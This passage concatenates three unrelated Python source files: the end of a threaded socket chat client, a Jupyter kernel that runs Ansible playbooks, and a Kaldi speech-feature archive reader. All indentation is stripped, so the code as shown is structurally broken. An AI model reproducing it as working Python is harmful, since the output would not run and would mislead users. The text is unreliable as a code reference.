print(message)
except:
break
def write():
"""Function to get a message and send it to the server"""
while True:
try:
# Wait for a message
inputMessage = input("")
if inputMessage == "/help":
print("----- HELP -----")
print("/help : Show this help")
print("/quit : Quit the chat")
print("--------------------")
elif inputMessage == "/quit":
# Close the connection and quit
client.close()
os._exit(0)
else:
# Adding nickname to the inputMessage
message = f"{nickname} >> {inputMessage}"
# Send the message to the server
client.send(message.encode("utf8"))
except:
break
def ping(ping_every: int):
"""Ping the server to see if the server is up
Parameters
----------
ping_every : int
Time between each ping
"""
while True:
sleep(ping_every)
try:
# Send PING message to the server
client.send("PING".encode("utf8"))
except:
# If the message can't reach show a message close the connection and quit
print("Sorry your message can't be delliver, server is ofline")
client.close()
os._exit(0)
if __name__ == "__main__":
# Create a thread for receive()
receive_thread = threading.Thread(target=receive)
receive_thread.start()
# Create a thread for write()
write_thread = threading.Thread(target=write)
write_thread.start()
# Create a thread for ping()
receive_ping = threading.Thread(target=ping, args=(1,))
receive_ping.start()
|
kernel.py
|
from __future__ import print_function
from ipykernel.kernelbase import Kernel
from subprocess import check_output
import pkg_resources
import atexit
import os
import io
import re
import yaml
import threading
from subprocess import Popen, STDOUT, PIPE
import logging
import json
import traceback
import tempfile
import psutil
from Queue import Queue, Empty
from collections import namedtuple
import zmq
from zmq.eventloop.zmqstream import ZMQStream
from modules import modules
from module_args import module_args
from task_args import task_args
from play_args import play_args
from ConfigParser import SafeConfigParser
from zmq.eventloop.ioloop import IOLoop
StatusMessage = namedtuple('StatusMessage', ['message'])
TaskCompletionMessage = namedtuple('TaskCompletionMessage', ['task_num'])
TASK_ARGS_MODULES = modules + task_args
__version__ = '0.3'
logger = logging.getLogger('ansible_kernel.kernel')
version_pat = re.compile(r'version (\d+(\.\d+)+)')
class AnsibleKernelHelpersThread(object):
def __init__(self, queue):
self.queue = queue
self.io_loop = IOLoop(make_current=False)
context = zmq.Context.instance()
self.pause_socket = context.socket(zmq.REP)
self.pause_socket_port = self.pause_socket.bind_to_random_port(
"tcp://127.0.0.1")
self.status_socket = context.socket(zmq.PULL)
self.status_socket_port = self.status_socket.bind_to_random_port(
"tcp://127.0.0.1")
self.pause_stream = ZMQStream(self.pause_socket, self.io_loop)
self.status_stream = ZMQStream(self.status_socket, self.io_loop)
self.pause_stream.on_recv(self.recv_pause)
self.status_stream.on_recv(self.recv_status)
self.thread = threading.Thread(target=self._thread_main)
self.thread.daemon = True
def start(self):
logger.info('thread.start')
self.thread.start()
atexit.register(self.stop)
def stop(self):
logger.info('thread.stop start')
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
logger.info('thread.stop end')
def recv_status(self, msg):
logger = logging.getLogger('ansible_kernel.kernel.recv_status')
logger.info(msg)
self.queue.put(StatusMessage(json.loads(msg[0])))
def recv_pause(self, msg):
logger = logging.getLogger('ansible_kernel.kernel.recv_pause')
logger.info("completed %s waiting...", msg)
self.queue.put(TaskCompletionMessage(json.loads(msg[0])))
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.make_current()
self.io_loop.start()
self.io_loop.close(all_fds=True)
class AnsibleKernel(Kernel):
implementation = 'ansible_kernel'
implementation_version = __version__
@property
def language_version(self):
m = version_pat.search(self.banner)
return m.group(1)
_banner = None
@property
def banner(self):
if self._banner is None:
self._banner = check_output(
['ansible', '--version']).decode('utf-8')
return self._banner
language_info = {'name': 'ansible',
'codemirror_mode': 'yaml',
'mimetype': 'text/yaml',
'file_extension': '.yml'}
help_links = [
{
'text': 'Ansible Reference',
'url': 'https://docs.ansible.com/ansible/latest/index.html'
}
]
def __init__(self, **kwargs):
Kernel.__init__(self, **kwargs)
logger = logging.getLogger('ansible_kernel.kernel.__init__')
self.ansible_cfg = None
self.ansible_process = None
self.current_play = None
self.next_task_file = None
self.task_files = []
self.playbook_file = None
self.silent = False
self.default_inventory = "[all]\nlocalhost\n"
self.default_play = yaml.dump(dict(hosts='localhost',
name='default',
gather_facts=False))
self.temp_dir = tempfile.mkdtemp(prefix="ansible_kernel_playbook")
self.queue = Queue()
self.tasks_counter = 0
self.current_task = None
logger.debug(self.temp_dir)
os.mkdir(os.path.join(self.temp_dir, 'roles'))
self.do_inventory(self.default_inventory)
self.do_execute_play(self.default_play)
def start_helper(self):
logger = logging.getLogger('ansible_kernel.kernel.start_helper')
self.helper = AnsibleKernelHelpersThread(self.queue)
self.helper.start()
logger.info("Started helper")
config = SafeConfigParser()
if self.ansible_cfg is not None:
config.readfp(io.BytesIO(self.ansible_cfg))
with open(os.path.join(self.temp_dir, 'ansible.cfg'), 'w') as f:
if not config.has_section('defaults'):
config.add_section('defaults')
config.set('defaults', 'stdout_callback', 'null')
config.set('defaults', 'callback_whitelist',
'ansible_kernel_helper')
config.set('defaults', 'callback_plugins', os.path.abspath(
pkg_resources.resource_filename('ansible_kernel', 'plugins/callback')))
if config.has_option('defaults', 'roles_path'):
roles_path = config.get('defaults', 'roles_path')
roles_path = ":".join([os.path.abspath(x) for x in roles_path.split(":")])
roles_path = "{0}:{1}".format(roles_path,
os.path.abspath(pkg_resources.resource_filename('ansible_kernel', 'roles')))
config.set('defaults', 'roles_path', roles_path)
else:
config.set('defaults', 'roles_path', os.path.abspath(
pkg_resources.resource_filename('ansible_kernel', 'roles')))
config.set('defaults', 'inventory', 'inventory')
if not config.has_section('callback_ansible_kernel_helper'):
config.add_section('callback_ansible_kernel_helper')
config.set('callback_ansible_kernel_helper',
'status_port', str(self.helper.status_socket_port))
config.write(f)
logger.info("Wrote ansible.cfg")
def rewrite_ports(self):
with open(self.playbook_file, 'r') as f:
playbook = yaml.load(f.read())
playbook[0]['tasks'][0]['pause_for_kernel']['port'] = self.helper.pause_socket_port
with open(self.playbook_file, 'w') as f:
f.write(yaml.safe_dump(playbook, default_flow_style=False))
def clean_up_task_files(self):
for task_file in self.task_files:
if os.path.exists(task_file):
os.unlink(task_file)
self.task_files = []
def process_message(self, message):
logger = logging.getLogger('ansible_kernel.kernel.process_message')
logger.info("message %s", message)
stop_processing = False
message_type = message[0]
message_data = message[1]
logger.info("message_type %s", message_type)
logger.info("message_data %s", message_data)
if message_data.get('task_name', '') == 'pause_for_kernel':
logger.debug('pause_for_kernel')
return stop_processing
if message_data.get('task_name', '') == 'include_tasks':
logger.debug('include_tasks')
if message_type == 'TaskStatus' and message_data.get('failed', False):
logger.debug('failed')
output = 'fatal: [%s]: FAILED!' % message_data['device_name']
if message_data.get('results', None):
output += " => "
output += message_data['results']
output += "\n"
stream_content = {'name': 'stdout', 'text': str(output)}
self.send_response(self.iopub_socket, 'stream', stream_content)
return stop_processing
output = ''
if message_type == 'TaskStart':
logger.debug('TaskStart')
output = 'TASK [%s] %s\n' % (
message_data['task_name'], '*' * (72 - len(message_data['task_name'])))
elif message_type == 'DeviceStatus':
logger.debug('DeviceStatus')
pass
elif message_type == 'PlaybookEnded':
logger.debug('PlaybookEnded')
output = "\nPlaybook ended\nContext lost!\n"
self.do_shutdown(False)
self.clean_up_task_files()
self.start_helper()
self.rewrite_ports()
self.start_ansible_playbook()
stop_processing = True
elif message_type == 'TaskStatus':
logger.debug('TaskStatus')
if message_data.get('changed', False):
logger.debug('changed')
output = 'changed: [%s]' % message_data['device_name']
elif message_data.get('unreachable', False):
logger.debug('unreachable')
output = 'fatal: [%s]: UNREACHABLE!' % message_data['device_name']
elif message_data.get('failed', False):
logger.debug('failed')
output = 'fatal: [%s]: FAILED!' % message_data['device_name']
else:
logger.debug('ok')
output = 'ok: [%s]' % message_data['device_name']
if message_data.get('results', None):
output += " => "
output += message_data['results']
output += "\n"
else:
output = str(message)
logger.info("output %s", output)
if not self.silent:
# Send standard output
logger.info("sending output")
stream_content = {'name': 'stdout', 'text': str(output)}
self.send_response(self.iopub_socket, 'stream', stream_content)
else:
logger.info("silent")
logger.info("stop_processing %s", stop_processing)
return stop_processing
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
logger = logging.getLogger('ansible_kernel.kernel.do_execute')
self.silent = silent
if not code.strip():
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
logger.debug('code %r', code)
if code.strip().startswith("#inventory"):
return self.do_inventory(code)
elif code.strip().startswith("#ansible.cfg"):
return self.do_ansible_cfg(code)
elif code.strip().startswith("#host_vars"):
return self.do_host_vars(code)
elif code.strip().startswith("#group_vars"):
return self.do_group_vars(code)
elif code.strip().startswith("#vars"):
return self.do_vars(code)
elif code.strip().startswith("#template"):
return self.do_template(code)
elif code.strip().startswith("#task"):
return self.do_execute_task(code)
elif code.strip().startswith("#play"):
return self.do_execute_play(code)
else:
return self.do_execute_task(code)
def do_inventory(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_inventory')
logger.info("inventory set to %s", code)
with open(os.path.join(self.temp_dir, 'inventory'), 'w') as f:
f.write(code)
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_ansible_cfg(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_ansible_cfg')
self.ansible_cfg = str(code)
config = SafeConfigParser()
if self.ansible_cfg is not None:
config.readfp(io.BytesIO(self.ansible_cfg))
logger.info("ansible.cfg set to %s", code)
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_host_vars(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_host_vars')
code_lines = code.strip().splitlines(True)
host = code_lines[0][len('#host_vars'):].strip()
logger.debug("host %s", host)
host_vars = os.path.join(self.temp_dir, 'host_vars')
if not os.path.exists(host_vars):
os.mkdir(host_vars)
with open(os.path.join(host_vars, host), 'w') as f:
f.write("".join(code_lines[1:]))
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_vars(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_vars')
code_lines = code.strip().splitlines(True)
vars = code_lines[0][len('#vars'):].strip()
logger.debug("vars %s", vars)
with open(os.path.join(self.temp_dir, vars), 'w') as f:
f.write("".join(code_lines[1:]))
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_template(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_template')
code_lines = code.strip().splitlines(True)
template = code_lines[0][len('#template'):].strip()
logger.debug("template %s", template)
with open(os.path.join(self.temp_dir, template), 'w') as f:
f.write("".join(code_lines[1:]))
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_group_vars(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_group_vars')
code_lines = code.strip().splitlines(True)
group = code_lines[0][len('#group_vars'):].strip()
logger.debug("group %s", group)
group_vars = os.path.join(self.temp_dir, 'group_vars')
if not os.path.exists(group_vars):
os.mkdir(group_vars)
with open(os.path.join(group_vars, group), 'w') as f:
f.write("".join(code_lines[1:]))
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_execute_play(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_execute_play')
if self.is_ansible_alive():
self.do_shutdown(False)
self.start_helper()
code_data = yaml.load(code)
logger.debug('code_data %r %s', code_data)
logger.debug('code_data type: %s', type(code_data))
self.current_play = code
playbook = []
current_play = yaml.load(self.current_play)
if current_play is None:
current_play = {}
playbook.append(current_play)
tasks = current_play['tasks'] = current_play.get('tasks', [])
current_play['roles'] = current_play.get('roles', [])
for role in current_play['roles']:
if "." in role:
self.get_galaxy_role(role)
current_play['roles'].insert(0, 'ansible_kernel_helpers')
tasks.append({'pause_for_kernel': {'host': '127.0.0.1',
'port': self.helper.pause_socket_port,
'task_num': self.tasks_counter - 1}})
tasks.append(
{'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter)})
logger.debug(yaml.safe_dump(playbook, default_flow_style=False))
self.playbook_file = (os.path.join(self.temp_dir, 'playbook.yml'))
with open(self.playbook_file, 'w') as f:
f.write(yaml.safe_dump(playbook, default_flow_style=False))
# Weird work around for streaming content not showing
stream_content = {'name': 'stdout', 'text': '\n'}
self.send_response(self.iopub_socket, 'stream', stream_content)
# End weird work around
self.start_ansible_playbook()
logger.info("done")
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def start_ansible_playbook(self):
logger = logging.getLogger('ansible_kernel.kernel.start_ansible_playbook')
command = ['ansible-playbook', 'playbook.yml']
logger.info("command %s", command)
env = os.environ.copy()
env['ANSIBLE_KERNEL_STATUS_PORT'] = str(self.helper.status_socket_port)
self.ansible_process = Popen(command,
cwd=self.temp_dir,
env=env,
stdout=PIPE,
stderr=STDOUT)
while True:
logger.info("getting message %s", self.helper.pause_socket_port)
try:
if not self.is_ansible_alive():
logger.info("ansible is dead")
self.send_process_output()
self.do_shutdown(False)
break
msg = self.queue.get(timeout=1)
except Empty:
logger.info("Empty!")
continue
logger.info(msg)
if isinstance(msg, StatusMessage):
if self.process_message(msg.message):
break
elif isinstance(msg, TaskCompletionMessage):
logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter)
break
logger.info("done")
def send_process_output(self):
output = self.ansible_process.communicate()[0]
logger.debug("process output %s", output)
stream_content = {'name': 'stdout', 'text': str(output)}
self.send_response(self.iopub_socket, 'stream', stream_content)
def do_execute_task(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_execute_task')
if self.helper is None:
output = "No play found. Run a valid play cell"
stream_content = {'name': 'stdout', 'text': str(output)}
self.send_response(self.iopub_socket, 'stream', stream_content)
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
self.current_task = code
try:
code_data = yaml.load(code)
except Exception:
code_data = code
logger.debug('code_data %s', code_data)
logger.debug('code_data type: %s', type(code_data))
if isinstance(code_data, basestring):
if (code_data.endswith("?")):
module = code_data[:-1].split()[-1]
else:
module = code_data.split()[-1]
data = self.get_module_doc(module)
payload = dict(
source='page',
data=data,
start=0)
logging.debug('payload %s', payload)
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [payload], 'user_expressions': {}}
elif isinstance(code_data, list):
code_data = code_data[0]
elif isinstance(code_data, dict):
code_data = code_data
elif code_data is None:
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
else:
logger.error('code_data %s unsupported type', type(code_data))
if 'include_role' in code_data.keys():
role_name = code_data['include_role'].get('name', '')
if '.' in role_name:
self.get_galaxy_role(role_name)
interrupted = False
try:
tasks = []
current_task_data = yaml.load(self.current_task)
current_task_data['ignore_errors'] = True
tasks.append(current_task_data)
tasks.append({'pause_for_kernel': {'host': '127.0.0.1',
'port': self.helper.pause_socket_port,
'task_num': self.tasks_counter}})
tasks.append(
{'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter + 1)})
logger.debug(yaml.safe_dump(tasks, default_flow_style=False))
self.next_task_file = os.path.join(self.temp_dir,
'next_task{0}.yml'.format(self.tasks_counter))
self.tasks_counter += 1
self.task_files.append(self.next_task_file)
with open(self.next_task_file, 'w') as f:
f.write(yaml.safe_dump(tasks, default_flow_style=False))
logger.info('Wrote %s', self.next_task_file)
self.helper.pause_socket.send('Proceed')
while True:
logger.info("getting message %s", self.helper.pause_socket_port)
msg = self.queue.get()
logger.info(msg)
if isinstance(msg, StatusMessage):
if self.process_message(msg.message):
break
elif isinstance(msg, TaskCompletionMessage):
logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter)
break
except KeyboardInterrupt:
logger.error(traceback.format_exc())
if interrupted:
return {'status': 'abort', 'execution_count': self.execution_count}
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_complete(self, code, cursor_pos):
code = code[:cursor_pos]
default = {'matches': [], 'cursor_start': 0,
'cursor_end': cursor_pos, 'metadata': dict(),
'status': 'ok'}
if code.strip().startswith("#inventory"):
return default
elif code.strip().startswith("#ansible.cfg"):
return default
elif code.strip().startswith("#host_vars"):
return default
elif code.strip().startswith("#group_vars"):
return default
elif code.strip().startswith("#task"):
return self.do_complete_task(code, cursor_pos)
elif code.strip().startswith("#play"):
return self.do_complete_play(code, cursor_pos)
else:
return self.do_complete_task(code, cursor_pos)
def do_complete_task(self, code, cursor_pos):
default = {'matches': [], 'cursor_start': 0,
'cursor_end': cursor_pos, 'metadata': dict(),
'status': 'ok'}
logger = logging.getLogger('ansible_kernel.kernel.do_complete_task')
logger.debug('code %r', code)
if not code or code[-1] == ' ':
return default
found_module = False
code_data = None
try:
code_data = yaml.load(code)
except Exception:
try:
code_data = yaml.load(code + ":")
except Exception:
code_data = None
if code_data is not None:
logger.debug('code_data %s', code_data)
if isinstance(code_data, list) and len(code_data) > 0:
code_data = code_data[0]
if isinstance(code_data, dict):
for key in code_data.keys():
if key in modules:
module_name = key
found_module = True
break
logger.debug('found_module %s', found_module)
tokens = code.split()
if not tokens:
return default
matches = []
token = tokens[-1]
start = cursor_pos - len(token)
logger.debug('token %s', token)
if not found_module:
for module in TASK_ARGS_MODULES:
if module.startswith(token):
matches.append(module)
else:
for arg in module_args.get(module_name, []) + task_args:
if arg.startswith(token):
matches.append(arg)
if not matches:
return default
matches = [m for m in matches if m.startswith(token)]
return {'matches': sorted(matches), 'cursor_start': start,
'cursor_end': cursor_pos, 'metadata': dict(),
'status': 'ok'}
def do_complete_play(self, code, cursor_pos):
default = {'matches': [], 'cursor_start': 0,
'cursor_end': cursor_pos, 'metadata': dict(),
'status': 'ok'}
logger = logging.getLogger('ansible_kernel.kernel.do_complete_task')
logger.debug('code %r', code)
if not code or code[-1] == ' ':
return default
tokens = code.split()
if not tokens:
return default
matches = []
token = tokens[-1]
start = cursor_pos - len(token)
logger.debug('token %s', token)
for arg in play_args:
if arg.startswith(token):
matches.append(arg)
if not matches:
return default
matches = [m for m in matches if m.startswith(token)]
return {'matches': sorted(matches), 'cursor_start': start,
'cursor_end': cursor_pos, 'metadata': dict(),
'status': 'ok'}
def do_inspect(self, code, cursor_pos, detail_level=0):
logger = logging.getLogger('ansible_kernel.kernel.do_inspect')
logger.debug("code %s", code)
logger.debug("cursor_pos %s", cursor_pos)
logger.debug("detail_level %s", detail_level)
if code.strip().startswith("#inventory"):
logger.info("#inentory not supported")
return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True}
elif code.strip().startswith("#task"):
return self.do_inspect_module(code, cursor_pos, detail_level)
elif code.strip().startswith("#play"):
logger.info("#play not supported")
return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True}
else:
return self.do_inspect_module(code, cursor_pos, detail_level)
def do_inspect_module(self, code, cursor_pos, detail_level=0):
logger = logging.getLogger('ansible_kernel.kernel.do_inspect_module')
data = dict()
code_data = yaml.load(code)
logger.debug("code_data %s", code_data)
if isinstance(code_data, basestring):
module = code_data
elif isinstance(code_data, dict):
for arg in task_args:
if arg in code_data:
del code_data[arg]
module = code_data.keys()[0]
else:
logger.warn('code type not supported %s', type(code_data))
return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': False}
data.update(self.get_module_doc(module))
return {'status': 'ok', 'data': data, 'metadata': {}, 'found': True}
def get_galaxy_role(self, role_name):
logger = logging.getLogger('ansible_kernel.kernel.get_galaxy_role')
command = ['ansible-galaxy', 'list', '-p', 'roles']
logger.debug("command %s", command)
p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT)
p.wait()
exitcode = p.returncode
logger.debug('exitcode %s', exitcode)
output = p.communicate()[0]
for line in output.splitlines():
if line.startswith('- '):
role, _, version = line[2:].partition(',')
role = role.strip()
if role == role_name:
return
p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT)
command = ['ansible-galaxy', 'install', '-p', 'roles', role_name]
logger.debug("command %s", command)
p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT)
p.wait()
exitcode = p.returncode
logger.debug('exitcode %s', exitcode)
output = p.communicate()[0]
logger.debug('output %s', output)
stream_content = {'name': 'stdout', 'text': str(output)}
self.send_response(self.iopub_socket, 'stream', stream_content)
def get_module_doc(self, module):
logger = logging.getLogger('ansible_kernel.kernel.get_module_doc')
data = {}
logger.debug("command %s", " ".join(
['ansible-doc', '-t', 'module', module]))
p = Popen(['ansible-doc', '-t', 'module', module],
stdout=PIPE, stderr=STDOUT)
p.wait()
exitcode = p.returncode
logger.debug('exitcode %s', exitcode)
output = p.communicate()[0]
logger.debug('output %s', output)
data['text/plain'] = output
return data
def is_ansible_alive(self):
if self.ansible_process is None:
return False
return self.ansible_process.poll() is None
def do_shutdown(self, restart):
logger = logging.getLogger('ansible_kernel.kernel.do_shutdown')
if self.ansible_process is None:
logger.debug("No ansible process")
return
try:
current_process = psutil.Process(self.ansible_process.pid)
children = current_process.children(recursive=True)
for child in children:
print('Child pid is {}'.format(child.pid))
except psutil.NoSuchProcess:
pass
if self.is_ansible_alive():
logger.info('killing ansible {0}'.format(self.ansible_process.pid))
self.ansible_process.kill()
for child in children:
logger.info('killing ansible sub {0}'.format(child.pid))
child.kill()
logger.info('stopping helper')
self.helper.stop()
self.helper = None
self.tasks_counter = 0
logger.info('clean up')
self.ansible_process = None
return {'status': 'ok', 'restart': restart}
|
kaldi_io_distill.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014-2016 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
#
# Modified:
# 2018 Yi Liu
import numpy as np
import sys, os, re, gzip, struct
import random
from six.moves import range
#################################################
# Adding kaldi tools to shell path,
# Select kaldi,
if not 'KALDI_ROOT' in os.environ:
# Default! To change run python with 'export KALDI_ROOT=/some_dir python'
os.environ['KALDI_ROOT']='/mnt/matylda5/iveselyk/Tools/kaldi-trunk'
# Add kaldi tools to path,
os.environ['PATH'] = os.popen('echo $KALDI_ROOT/src/bin:$KALDI_ROOT/tools/openfst/bin:$KALDI_ROOT/src/fstbin/:$KALDI_ROOT/src/gmmbin/:$KALDI_ROOT/src/featbin/:$KALDI_ROOT/src/lm/:$KALDI_ROOT/src/sgmmbin/:$KALDI_ROOT/src/sgmm2bin/:$KALDI_ROOT/src/fgmmbin/:$KALDI_ROOT/src/latbin/:$KALDI_ROOT/src/nnetbin:$KALDI_ROOT/src/nnet2bin:$KALDI_ROOT/src/nnet3bin:$KALDI_ROOT/src/online2bin/:$KALDI_ROOT/src/ivectorbin/:$KALDI_ROOT/src/lmbin/').readline().strip() + ':' + os.environ['PATH']
#################################################
# Define all custom exceptions,
class UnsupportedDataType(Exception): pass
class UnknownVectorHeader(Exception): pass
class UnknownMatrixHeader(Exception): pass
class BadSampleSize(Exception): pass
class BadInputFormat(Exception): pass
class SubprocessFailed(Exception): pass
class FeatureReader(object):
"""Read kaldi features"""
def __init__(self, data):
"""This is a modified version of read_mat_scp in kaldi_io.
I wrote the class because we don't want to open and close file frequently.
The number of file descriptors is limited (= the num of arks) so we can keep all the files open.
Once the feature archive is opened, it just keeps the file descriptors until the class is closed.
Args:
data: The kaldi data directory.
"""
self.fd = {}
self.data = data
self.dim = self.get_dim()
self.xvector_dim = self.get_xvector_dim()
self.utt2num_frames = {}
# Load utt2num_frames that the object can find the length of the utterance quickly.
assert os.path.exists(os.path.join(data, "utt2num_frames")), "[Error] Expect utt2num_frames exists in %s " % data
with open(os.path.join(data, "utt2num_frames"), 'r') as f:
for line in f.readlines():
utt, length = line.strip().split(" ")
self.utt2num_frames[utt] = int(length)
def get_dim(self):
with open(os.path.join(self.data, "feats.scp"), "r") as f:
dim = self.read(f.readline().strip())[0].shape[1]
return dim
def get_xvector_dim(self):
with open(os.path.join(self.data, "xvector.scp"), "r") as f:
xvector_dim = self.read_xvector(f.readline().strip()).shape[1]
return xvector_dim
def close(self):
for name in self.fd:
self.fd[name].close()
def read(self, file_or_fd, length=None, shuffle=False, start=None):
""" [mat, start_point] = read(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
In our case, file_or_fd can only be a filename with offset. We will save the fd after opening it.
Note:
It is really painful to load data from compressed archives. To speed up training, the archives should be
prepared as uncompressed data. Directly exit if loading data from compressed data. If you really like to
use that, modify by yourself.
Maybe other high-performance library can be used to accelerate the loading. No time to try here.
"""
utt, file_or_fd = file_or_fd.split(" ")
(filename, offset) = file_or_fd.rsplit(":", 1)
if filename not in self.fd:
fd = open(filename, 'rb')
assert fd is not None
self.fd[filename] = fd
# Move to the target position
self.fd[filename].seek(int(offset))
try:
binary = self.fd[filename].read(2).decode()
if binary == '\0B':
mat = _read_mat_binary(self.fd[filename])
else:
pass
except:
raise IOError("Cannot read features from %s" % file_or_fd)
if length is not None:
if start is None:
num_features = mat.shape[0]
length = num_features if length > num_features else length
start = random.randint(0, num_features - length) if shuffle else 0
mat = mat[start:start + length, :]
else:
assert not shuffle, "The start point is specified, thus shuffling is invalid."
mat = mat[start:start + length, :]
return mat, start
def read_xvector(self, file_or_fd, length=None, shuffle=False, start=None):
utt, file_or_fd = file_or_fd.split(" ")
(filename, offset) = file_or_fd.rsplit(":", 1)
if filename not in self.fd:
fd = open(filename, 'rb')
assert fd is not None
self.fd[filename] = fd
# Move to the target position
self.fd[filename].seek(int(offset))
try:
binary = self.fd[filename].read(2).decode()
if binary == '\0B':
fd=self.fd[filename]
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_mat(fd, header)
elif header == 'FM ': sample_size = 4 # floats
elif header == 'DM ': sample_size = 8 # doubles
elif header == 'FV ': sample_size = 4 # doubles
else: raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
#pdb.set_trace()
assert (fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
#vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
#s1, cols = np.frombuffer(fd.read(10), dtype='int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(vec_size * sample_size)
if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : vec = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
mat = np.reshape(vec,(1,vec_size))
# Do we need to load the entire recording?
self.fd[filename]
else:
raise IOError("Cannot read features from %s" % file_or_fd)
except:
raise IOError("Cannot read features from %s" % file_or_fd)
return mat
def read_segment(self, file_or_fd, length=None, shuffle=False, start=None):
""" [mat, start_point] = read_segment(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
We can load a segment of the feature, rather than the entire recording.
I hope the segment-wise loading is helpful in the long utterance case.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
In our case, file_or_fd can only be a filename with offset. We will save the fd after opening it.
"""
utt, file_or_fd = file_or_fd.split(" ")
(filename, offset) = file_or_fd.rsplit(":", 1)
if filename not in self.fd:
fd = open(filename, 'rb')
assert fd is not None
self.fd[filename] = fd
# Move to the target position
self.fd[filename].seek(int(offset))
try:
binary = self.fd[filename].read(2).decode()
if binary == '\0B':
# Do we need to load the entire recording?
if length is not None:
if start is None:
num_features = self.utt2num_frames[utt]
length = num_features if length > num_features else length
start = random.randint(0, num_features - length) if shuffle else 0
mat = _read_submat_binary(self.fd[filename], start, length)
else:
assert not shuffle, "The start point is specified, thus shuffling is invalid."
mat = _read_submat_binary(self.fd[filename], start, length)
else:
mat = _read_mat_binary(self.fd[filename])
else:
raise IOError("Cannot read features from %s" % file_or_fd)
except:
raise IOError("Cannot read features from %s" % file_or_fd)
return mat, start
class FeatureReaderV2(object):
"""Read kaldi features and alignments.
This is used for multitask_v1 training.
"""
def __init__(self, data_dir, ali_dir, left_context, right_context):
"""data_dir contains feats.scp, utt2num_frames, vad.scp.
ali_dir contains pdf.scp (NOT ali.scp) which is confusing here.
ali.scp consists of transition ids while pdf.scp consists of pdf ids.
So ali.scp should be converted to pdf.scp before training.
In Kaldi, ali-to-pdf and ali-to-post is used in the egs generation script.
Args:
data_dir: The kaldi data directory.
ali_dir: The kaldi ali directory.
"""
self.ali_fd = {}
self.vad_fd = {}
self.fd = {}
self.left_context = left_context
self.right_context = right_context
self.data_dir = data_dir
self.ali_dir = ali_dir
# Load utt2num_frames that the object can find the length of the utterance quickly.
self.utt2num_frames = {}
assert os.path.exists(os.path.join(data_dir, "utt2num_frames")), "[Error] Expect utt2num_frames exists in %s " % data_dir
with open(os.path.join(data_dir, "utt2num_frames"), 'r') as f:
for line in f.readlines():
utt, length = line.strip().split(" ")
self.utt2num_frames[utt] = int(length)
# We do not have offset here. So we have to record the offset in different files in order to seek them quickly.
self.utt2feats_offset = {}
assert os.path.exists(os.path.join(data_dir, "feats.scp")), "[ERROR] Expect feats.scp exists in %s" % data_dir
with open(os.path.join(data_dir, "feats.scp")) as f:
for line in f.readlines():
utt, info = line.strip().split(" ")
info = info.split(":")
# info[0] is the filename, info[1] is the offset
self.utt2feats_offset[utt] = [info[0], int(info[1])]
self.utt2vad_offset = {}
assert os.path.exists(os.path.join(data_dir, "vad.scp")), "[ERROR] Expect vad.scp exists in %s" % data_dir
with open(os.path.join(data_dir, "vad.scp")) as f:
for line in f.readlines():
utt, info = line.strip().split(" ")
info = info.split(":")
self.utt2vad_offset[utt] = [info[0], int(info[1])]
self.utt2ali_offset = {}
assert os.path.exists(os.path.join(ali_dir, "pdf.scp")), "[ERROR] Expect pdf.scp exists in %s" % ali_dir
with open(os.path.join(ali_dir, "pdf.scp")) as f:
for line in f.readlines():
utt, info = line.strip().split(" ")
info = info.split(":")
self.utt2ali_offset[utt] = [info[0], int(info[1])]
self.dim = self.get_dim()
def get_dim(self):
with open(os.path.join(self.data_dir, "feats.scp"), "r") as f:
dim = self.read_segment(f.readline().split(" ")[0])[0].shape[1]
return dim
